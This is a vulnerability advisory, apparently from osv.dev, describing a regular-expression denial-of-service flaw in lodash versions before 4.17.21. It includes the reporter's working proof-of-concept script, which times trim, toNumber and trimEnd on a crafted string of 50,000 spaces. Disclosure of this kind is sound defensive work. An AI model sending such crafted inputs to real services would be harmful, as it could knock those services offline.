OSV: GHSA-29MW-WPGM-HMR9
Published: Jan 06, 2022 - 8:30 p.m.

Regular Expression Denial of Service (ReDoS) in lodash

Source: Google (osv.dev)

Tags: vulnerable package, regular expression denial of service, lodash, tonumber, trim, trimend

AI Score: 6 (Confidence: High)

EPSS: 0.002 (Percentile: 61.4%)

All versions of package lodash prior to 4.17.21 are vulnerable to Regular Expression Denial of Service (ReDoS) via the toNumber, trim and trimEnd functions.

Steps to reproduce (provided by reporter Liyuan Chen):

var lo = require('lodash');

// Build "1", then n spaces, then "1". Nothing trails the final "1", so a
// correct trim removes nothing, but the trailing-whitespace regex still has
// to try, and fail, from every one of the n spaces.
function build_blank(n) {
    var ret = "1";
    for (var i = 0; i < n; i++) {
        ret += " ";
    }
    return ret + "1";
}

var s = build_blank(50000);

// Time each affected function on the same adversarial input.
var time0 = Date.now();
lo.trim(s);
var time_cost0 = Date.now() - time0;
console.log("time_cost0: " + time_cost0);

var time1 = Date.now();
lo.toNumber(s);
var time_cost1 = Date.now() - time1;
console.log("time_cost1: " + time_cost1);

var time2 = Date.now();
lo.trimEnd(s);
var time_cost2 = Date.now() - time2;
console.log("time_cost2: " + time_cost2);
